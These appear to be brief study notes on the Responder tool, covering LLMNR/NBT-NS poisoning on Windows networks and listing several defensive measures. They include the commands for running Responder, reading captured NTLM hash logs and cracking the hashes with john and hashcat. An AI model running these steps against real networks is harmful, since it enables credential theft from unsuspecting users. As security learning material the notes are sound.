Responder

Focused on attacks on NTLM Auth Name Resolution
Windows can get Lonely
Ask neighbors for that name
and Authentication

Setup and wait for somebody to hit.
Maybe we'll get hit by Vulnerability Scanner (w/creds)
Feed Word docs w/remote picture/icon to fake-smb-share
Setup 'wpad' proxy plugin, and maybe catch 'auto-proxy'

Defense:
Disable NBT-NS and LLMNR
SMB Signing
Disable Autodetect Proxy
Private VLANS to isolate clients

execute: 
> sudo Responder.py -I eth0
Poisoners: LLMNR, NBT, DNS
Servers: HTTP, HTTPS, Kerberos, etc

Windows Target: 
\\tacocat
Announce request, and Captures the pw-hashes !!!
bob..1234

hashes:
cd /opt/responder/logs
cat SMBv2.IP.xxx.txt
john --format=netntlmv2 /opt/responder/logs/SMBv2.IP.xxx.txt
hashcat -m 5600 hash.txt pwlist.txt -o cracked.txt